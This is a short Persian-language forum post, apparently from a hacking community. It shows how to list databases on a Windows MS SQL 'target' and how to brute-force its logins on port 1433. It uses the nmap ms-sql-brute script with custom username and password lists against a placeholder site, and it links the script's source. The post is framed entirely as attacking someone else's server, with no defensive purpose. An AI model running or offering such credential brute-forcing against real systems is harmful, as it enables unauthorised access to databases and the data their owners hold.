درود دوستان عزیزم در زمانی که به نامهای دیتابیس یک تارگت ویندوزی دسترسی داشتید میتوانید با دستور زیر نام دیتابیس ها را دریافت و به وسیله ابزار محبوب nmap بر روی پورت 1433 بروت فورس نمائید :
show all database in ms sql
nmap command
sours
show all database in ms sql
کد:
SELECT name FROM master.sys.databases
کد:
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt site.com
sours
کد:
https://svn.nmap.org/nmap/scripts/ms-sql-brute.nse